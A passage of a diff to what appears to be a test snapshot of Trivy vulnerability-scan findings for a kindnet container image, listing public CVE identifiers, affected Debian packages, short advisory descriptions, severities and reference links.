"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libxtables12", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "1.3.8+dfsg-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-24031", + "installedVersion": "1.3.8+dfsg-3", + "packageName": "libzstd1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "https://access.redhat.com/security/cve/CVE-2021-24031", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", + "https://github.com/facebook/zstd/issues/1630", + "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", + "https://ubuntu.com/security/notices/USN-4760-1", + "https://ubuntu.com/security/notices/USN-5720-1", + "https://www.cve.org/CVERecord?id=CVE-2021-24031", + "https://www.facebook.com/security/advisories/cve-2021-24031", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "description": "In the Zstandard command-line utility prior to v1.4.1, output files were created with default permissions. Correct file permissions (matching the input) would only be set at completion time. Output files could therefore be readable or writable to unintended parties.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "zstd: adds read permissions to files while being compressed or uncompressed", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2021-24031", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "https://access.redhat.com/security/cve/CVE-2021-24031", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981404", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24031", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/facebook/zstd/issues/1630", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24031", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://ubuntu.com/security/notices/USN-4760-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-5720-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-24031", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://www.facebook.com/security/advisories/cve-2021-24031", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.3.8+dfsg-3+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-24032", + "installedVersion": "1.3.8+dfsg-3", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-24032", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", + "https://github.com/facebook/zstd/issues/2491", + "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", + "https://ubuntu.com/security/notices/USN-4760-1", + "https://ubuntu.com/security/notices/USN-5720-1", + "https://www.cve.org/CVERecord?id=CVE-2021-24032", + "https://www.facebook.com/security/advisories/cve-2021-24032", + ], + }, + "category": "Vulnerability", + "description": "Beginning in v1.4.1 and prior to v1.4.9, due to an incomplete fix for CVE-2021-24031, the Zstandard command-line utility created output files with default permissions and restricted those permissions immediately afterwards. Output files could therefore momentarily be readable or writable to unintended parties.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "zstd: Race condition allows attacker to access world-readable destination file", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-24032", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://access.redhat.com/security/cve/CVE-2021-24032", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982519", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24032", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://github.com/facebook/zstd/issues/2491", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-24032", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-4760-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-5720-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-24032", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://www.facebook.com/security/advisories/cve-2021-24032", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://ubuntu.com/security/notices/USN-5745-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], "severity": "LOW", @@ -92012,3323 +92954,3206 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-7169", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/security/cve/CVE-2018-7169", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "https://github.com/shadow-maint/shadow/pull/97", + "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "https://security.gentoo.org/glsa/201805-09", + "https://ubuntu.com/security/notices/USN-5254-1", + "https://www.cve.org/CVERecord?id=CVE-2018-7169", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", - }, - { - "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://avd.aquasec.com/nvd/cve-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://access.redhat.com/security/cve/CVE-2018-7169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/shadow-maint/shadow/pull/97", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://security.gentoo.org/glsa/201805-09", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://ubuntu.com/security/notices/USN-5254-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.5-1.1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.5-1.1", + "packageName": "login", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - 